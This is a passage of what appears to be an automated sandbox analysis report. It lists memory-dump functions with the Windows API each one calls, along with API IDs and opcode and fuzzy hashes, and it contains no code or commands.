                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0049AD37
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 9419c94cb552d97f26da3a367cf0a4e20f0dea95934b513912b6afb729422224
                                                        • Instruction ID: 1f5c2de1ef2007ebb2f747947a2ae750d096f053a90d3bdb0b201ef71f8ca880
                                                        • Opcode Fuzzy Hash: 9419c94cb552d97f26da3a367cf0a4e20f0dea95934b513912b6afb729422224
                                                        • Instruction Fuzzy Hash: D621D6755097809FDB128F25DC44B92BFB4EF16310F0885DBE9848F663D3359918DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0049AD37
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 8cd3daf97544b4248495197699f21b5ec97a5529be767b81ce527dd482a540c4
                                                        • Instruction ID: 7b01f58e9845bdb84bcfe542a69b1344a27754359452fd25697a53adf0969a94
                                                        • Opcode Fuzzy Hash: 8cd3daf97544b4248495197699f21b5ec97a5529be767b81ce527dd482a540c4
                                                        • Instruction Fuzzy Hash: B0118C755006009FEB208F55D884B56FFA4EF04321F08856AED498BA22D335E814DBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0049B329
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 0c98cbf58a14a94662751a57a8bc9367393cb279e7671acb182a8665a5c27822
                                                        • Instruction ID: b9aaa7e1aa7a922accd1f02067fc435f9a0a6c4d8f7c551cf762b73b6d3982d7
                                                        • Opcode Fuzzy Hash: 0c98cbf58a14a94662751a57a8bc9367393cb279e7671acb182a8665a5c27822
                                                        • Instruction Fuzzy Hash: AC119A71508780AFDB228F11DC45A62FFB4EF06220F09849AED884B662C275A918DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0049B329
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 942ff0b11053c6832504a96229664d66ac9b95c3285f1e56c8dc15535b12c32a
                                                        • Instruction ID: 980de018fcccf2d8ca208208ed5ac754d58ab88362063762690c238ecae86393
                                                        • Opcode Fuzzy Hash: 942ff0b11053c6832504a96229664d66ac9b95c3285f1e56c8dc15535b12c32a
                                                        • Instruction Fuzzy Hash: 40018B35500700DFEB30CF45E985B22FFA0EF18720F08C5AADD890B612C375A418DBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02030118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 020301D0
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: f1f48135c34a966e2c58ecb4762906a7c348405c3eb4ab5c6cad1d8d3de20730
                                                        • Instruction ID: 313a8fe0cba379ca86b2a9b9e7190228a181a896dc493808ce7c3cc3f56f0e11
                                                        • Opcode Fuzzy Hash: f1f48135c34a966e2c58ecb4762906a7c348405c3eb4ab5c6cad1d8d3de20730
                                                        • Instruction Fuzzy Hash: 4F31377650E7C08FE7138B759C65692BFB4AF03210F0E84DBD884CF1A3D6299809DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0203067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0203072D
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: f5fec38fe75e930f23c45daa60c5cc2de7ecbb543f0da2f72971669c00fb979b
                                                        • Instruction ID: 5ed7e89aacc8a2bae8e66ee2edd6c92bc686bb67764dee7ea0124cc1caa2f809
                                                        • Opcode Fuzzy Hash: f5fec38fe75e930f23c45daa60c5cc2de7ecbb543f0da2f72971669c00fb979b
                                                        • Instruction Fuzzy Hash: C2318371505380AFE722CF65CC85F52BFF8EF06210F09849EE9848B292D335E908CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02030D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02030DD6
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 3996b847b5dbe6ca7edd7612e37164a9a2aca1dc463caf9a3aa25e312ea64031
                                                        • Instruction ID: d6c1766da720324c825ce6f07133bde872cb79dcc24ef2a95f761983f8bf2883
                                                        • Opcode Fuzzy Hash: 3996b847b5dbe6ca7edd7612e37164a9a2aca1dc463caf9a3aa25e312ea64031
                                                        • Instruction Fuzzy Hash: 0E319871509380AFE722CB65DC45B96BFE8DF06214F0884AAE984CF293D375A905C772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 0049BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: fbc03bce12a42457fd1fb143fcd4d8b40cbf918f291aff76e4cf0a24536a5ea9
                                                        • Instruction ID: 7d9cde7164c628bb7927576fba12ceda8e8722a2e23a6f4a391e9b505c6d706a
                                                        • Opcode Fuzzy Hash: fbc03bce12a42457fd1fb143fcd4d8b40cbf918f291aff76e4cf0a24536a5ea9
                                                        • Instruction Fuzzy Hash: AC31B471109780AFEB22CB60DC55F97BFB8EF06310F08859BE984CB192D224A908C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 0049AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: eabd2a32888cd8b4cfc78a76658724cb90e4a80bcdf57c78787fd8e38c5a1cd1
                                                        • Instruction ID: d3137fca823f6ebdf527a91829d723f217521145737e0117521f28be2719b619
                                                        • Opcode Fuzzy Hash: eabd2a32888cd8b4cfc78a76658724cb90e4a80bcdf57c78787fd8e38c5a1cd1
                                                        • Instruction Fuzzy Hash: C321D7B2509780AFEB12CB20DC45B97BFB8EF06310F0884DBE984DB193C2259945C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02030FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0203109E
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 07c63e58753ecdfe51d4873621f8866a6cadcec3200c28ccc06087dbdaf8bd1b
                                                        • Instruction ID: 4843c5f1d9f5e44d7e0a0e2572e6a3e941a14c9a452a5092aa6192d822a1b0c3
                                                        • Opcode Fuzzy Hash: 07c63e58753ecdfe51d4873621f8866a6cadcec3200c28ccc06087dbdaf8bd1b
                                                        • Instruction Fuzzy Hash: B031717550E3C0AFD3138B358C55B56BFB4AF47610F1A81DBD884CF2A3D629A909C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 0049B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 9536c1dc5438b44598aed7a4558394656c18f0c719e8b90b0b0324004a94ee48
                                                        • Instruction ID: b249dfbc191d9329737126bb0155f2a981103259e2397f463c65589847489024
                                                        • Opcode Fuzzy Hash: 9536c1dc5438b44598aed7a4558394656c18f0c719e8b90b0b0324004a94ee48
                                                        • Instruction Fuzzy Hash: E4219471505384AFE721CB15DC45FA7BFA8EF06310F0884ABE945DB152D764A908CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02030784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 02030819
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: df644fa4496df0f60e6527c69f415bfb2f2911dfa4f871f908117c9deab55a26
                                                        • Instruction ID: 56545f3e8b6afc0a42ccd25aae7c572b3f83f67ef1da8a1b5e5486975cebe4de
                                                        • Opcode Fuzzy Hash: df644fa4496df0f60e6527c69f415bfb2f2911dfa4f871f908117c9deab55a26
                                                        • Instruction Fuzzy Hash: 03210A76509780AFE713CB159C41FA3BFA8EF46720F0981DBF9848B193D224A905C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02030464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02030502
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 09eafa63ad1a7bf954abba844710abfe89e22cb73342ee8140681f32b956255a
                                                        • Instruction ID: c61d74ad9e7e2ad43c99edae5f8bebf13fe813fbbdaa5a3de6f787be0d155bc7
                                                        • Opcode Fuzzy Hash: 09eafa63ad1a7bf954abba844710abfe89e22cb73342ee8140681f32b956255a
                                                        • Instruction Fuzzy Hash: 9021907540E3C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F693D225A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020306AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0203072D
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 01debc5ceff990bc1cc7925d012cc69f8e6d628cba3789a9d9478d0e0ed031f8
                                                        • Instruction ID: bd980ab1448ccffa1952bd4357af358818caa7f0d402d780c6b3073aa585fd31
                                                        • Opcode Fuzzy Hash: 01debc5ceff990bc1cc7925d012cc69f8e6d628cba3789a9d9478d0e0ed031f8
                                                        • Instruction Fuzzy Hash: 1A21B071900700EFE722DF65CC85F66FBE8EF08610F04846EE9898B291D331E904DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02030854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 020308E5
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: d2159c647073a063df1d513f8d3b974b518a64a5d8d7fdd554a78d74d747b1e6
                                                        • Instruction ID: ffd8f2be72ac7acf881f26ffe411a1e9d3e9aa6e705381184446201a159f4946
                                                        • Opcode Fuzzy Hash: d2159c647073a063df1d513f8d3b974b518a64a5d8d7fdd554a78d74d747b1e6
                                                        • Instruction Fuzzy Hash: 0C21A471409380AFE722CF51DC45F56BFB8EF06314F0985DBE9849B153C265A909CB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A8B4, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 0049A94A
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageName
                                                        • String ID:
                                                        • API String ID: 2060303382-0
                                                        • Opcode ID: 6db4090ac116688112f23a4ecf2e4feda4e3d2fdb59890ef8f81e4a8ebfdb08c
                                                        • Instruction ID: 42205761bca9679ea3bb66d183a80916aa6ec9b59b6fc66394112ccbfd7c02ac
                                                        • Opcode Fuzzy Hash: 6db4090ac116688112f23a4ecf2e4feda4e3d2fdb59890ef8f81e4a8ebfdb08c
                                                        • Instruction Fuzzy Hash: BB219575509780AFD3138B259C51B62BFB4EF87610F0981DBE8848B653D224A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02030D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02030DD6
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 38d9c7a3f06c96b2a21e3fcb15a328514073436fe1ad3a51a07fb134fbc13123
                                                        • Instruction ID: a44a6674723fe7630578d88682f8da515ef80689e71386c28b1e058431f2cad5
                                                        • Opcode Fuzzy Hash: 38d9c7a3f06c96b2a21e3fcb15a328514073436fe1ad3a51a07fb134fbc13123
                                                        • Instruction Fuzzy Hash: B5216F71601340AFF722DB65DC85BA6FBDCEF05614F04846AE9489B282D775E904CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 0049BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 21acbc00706e15699f8c4b1b3fc89b58b4b343de2b5dd33da46c171b2e9e8bb6
                                                        • Instruction ID: c3a501b1ed2ac64ff4b4143bf78c1565473d22ae85aa46ad4567b39928901a53
                                                        • Opcode Fuzzy Hash: 21acbc00706e15699f8c4b1b3fc89b58b4b343de2b5dd33da46c171b2e9e8bb6
                                                        • Instruction Fuzzy Hash: A711CD72100704EFEB21CF61DC85FABFBACEF04320F14896AF9458A641D634A9048BB6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 0049B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: 277feb95b8b7989f350daa7af4d07239649bbcd32cf800a3855f2b217c7d35cd
                                                        • Instruction ID: 054aa72c4edcc40341ccc08fc27fb5d582177c7e31731d22bd07f3dbb814043d
                                                        • Opcode Fuzzy Hash: 277feb95b8b7989f350daa7af4d07239649bbcd32cf800a3855f2b217c7d35cd
                                                        • Instruction Fuzzy Hash: DC11AC71600304EFEB20CF15DD85FABBBA8EF04320F14846AED09CB241D774E9048AA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02030F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02030FB0
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: f8e7dfa64bfc8b8fa4371414d3976796583cbbb220f150db667b6b0e71bdc7a1
                                                        • Instruction ID: da26bcee3add4a6319d426cb54399903e8a7d667394e03398d7ae01a5b3e05f5
                                                        • Opcode Fuzzy Hash: f8e7dfa64bfc8b8fa4371414d3976796583cbbb220f150db667b6b0e71bdc7a1
                                                        • Instruction Fuzzy Hash: 1F215E7150E7C09FDB138B25DC95B92BFB8AF03214F0D84DAD888CF653D2659508D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0203137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: bd2bba402a35e8f7c1c9c388af3e37bfa478b4e67f01a97858f3f8935d915d90
                                                        • Instruction ID: ea747538081229c8ad9bb226fed909effff9b75d56085ea84588a7adf628a5d6
                                                        • Opcode Fuzzy Hash: bd2bba402a35e8f7c1c9c388af3e37bfa478b4e67f01a97858f3f8935d915d90
                                                        • Instruction Fuzzy Hash: 7321A4765047809FDB22CF25DC85B96FFF4EF06220F08849EED858B562D335A449DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0049AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: bdfeede293d6b43f3213d15c1121126c598ba5373310a2c5d70ad10cebd29697
                                                        • Instruction ID: 25711f628f0d76799b07e80dc4e7d45e9c5dea38200a43d7def809375a539266
                                                        • Opcode Fuzzy Hash: bdfeede293d6b43f3213d15c1121126c598ba5373310a2c5d70ad10cebd29697
                                                        • Instruction Fuzzy Hash: 242172716053809FDB21CF25DC44B53BFA8EF56210F0884ABED49CB252D265E814CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        • Opcode ID: c6a2ddf66f2bff43a9cf2efee7e9b9d67d710e835113cb7ea65067834fa41554
                                                        • Instruction ID: 54ef9de0c2cf2e958ea8eddfeb391e0e28aec6d3228d7c36fa4bceea783223cf
                                                        • Opcode Fuzzy Hash: c6a2ddf66f2bff43a9cf2efee7e9b9d67d710e835113cb7ea65067834fa41554
                                                        • Instruction Fuzzy Hash: E621A4755093C09FDB128B25DC55A92BFA4EF07320F0984EBDD858F263D224A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020310D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02031148
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: a5ad547a82384a858721f3203302b408d0139aa5874192f019535c7f9f48581f
                                                        • Instruction ID: ef33af13a29734a697bd97220245b8e1a8b67b92ece00731ad6aad29d8ab248a
                                                        • Opcode Fuzzy Hash: a5ad547a82384a858721f3203302b408d0139aa5874192f019535c7f9f48581f
                                                        • Instruction Fuzzy Hash: D4216D7540D7C09FD7138B259C54A62BFB4EF57620F0980DBDC848F2A3D2696808D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A1C4, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0049A23E
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: f047272c356e70af3732c4ad3d6e6933d2d8699cc7f7158eb8984194c319d5f3
                                                        • Instruction ID: 012f4768027ce311eb1f509181d881cac25b072d8ce9685e426e785d7c3cb42f
                                                        • Opcode Fuzzy Hash: f047272c356e70af3732c4ad3d6e6933d2d8699cc7f7158eb8984194c319d5f3
                                                        • Instruction Fuzzy Hash: B811A271909380AFD311CB25CC45B66FFB8EF86620F19819BEC488B642D325A915CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 0049AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 66f8c29815ed5093f8f050f8523dcd58bf773fbe653c5ff196dc4f9a4cbb34df
                                                        • Instruction ID: 1ea19b789ef4c297fb63c7c5d4d6c8fdbb0868a88b0d70d0ea8e44a393606a4e
                                                        • Opcode Fuzzy Hash: 66f8c29815ed5093f8f050f8523dcd58bf773fbe653c5ff196dc4f9a4cbb34df
                                                        • Instruction Fuzzy Hash: 3411BF72500700EFEB21DF55DC85BA7FBA8EF44720F14846AED499B281D774A904CBB6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 0049BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 9ee412ce5c4c740ef1896130cde8d59e2b20bb64e6da64f906782811ed75f6ea
                                                        • Instruction ID: 631798988f0fd4484c423ed0fc2b12a0c43fa5c3895689ac8abeb33d51b4cc74
                                                        • Opcode Fuzzy Hash: 9ee412ce5c4c740ef1896130cde8d59e2b20bb64e6da64f906782811ed75f6ea
                                                        • Instruction Fuzzy Hash: 77119071504380AFDB21CF65DC44B53FFF4EF05210F0884AEE9858B662D375A818CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02030886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,777FB1EB,00000000,00000000,00000000,00000000), ref: 020308E5
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: e04a93757a493f758e8f6b6ecae2a44e2cf28de5be6266d227455186b84dfdd3
                                                        • Instruction ID: a8769e77a1cc184fc8fd4e362ee1b674b7ed3de6442f537195546a0cfd2c6f8a
                                                        • Opcode Fuzzy Hash: e04a93757a493f758e8f6b6ecae2a44e2cf28de5be6266d227455186b84dfdd3
                                                        • Instruction Fuzzy Hash: 2E11BF72501704EFEB22CF55DC85FAAFBE8EF14720F04895AED499A241C671A504DBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0049A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2162740486.000000000049A000.00000040.00000001.sdmp, Offset: 0049A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        • Opcode ID: 20f2a550adb3b8b786d3ff06efcba52ae5af20fbe52cf47c2472fae1fdf2f1e3
                                                        • Instruction ID: bd895714778265ebe426f45c68ec7f4cfe3a2014abc4194fd571246b2039a0dd
                                                        • Opcode Fuzzy Hash: 20f2a550adb3b8b786d3ff06efcba52ae5af20fbe52cf47c2472fae1fdf2f1e3
                                                        • Instruction Fuzzy Hash: 41118F715093C09FEB228B25DC54A62BFB4DF47614F0884DBEDC44F263D265A818DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 020312D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0203132F
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.2164006085.0000000002030000.00000040.00000001.sdmp, Offset: 02030000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 74d54b7479394779af43aadb8251f95d64a226da931c9e7c530c13e6c27f5ec3
                                                        • Instruction ID: 6f654cf6edf01a6bf7e1d7b22678a7b9f8dcce9f2e9db4862955904c21e583b9
                                                        • Opcode Fuzzy Hash: 74d54b7479394779af43aadb8251f95d64a226da931c9e7c530c13e6c27f5ec3
                                                        • Instruction Fuzzy Hash: AA11C4715043809FDB128F25DC85B96FFE4EF06220F0884EEED498B252D335A404CB61
                                                        Uniqueness

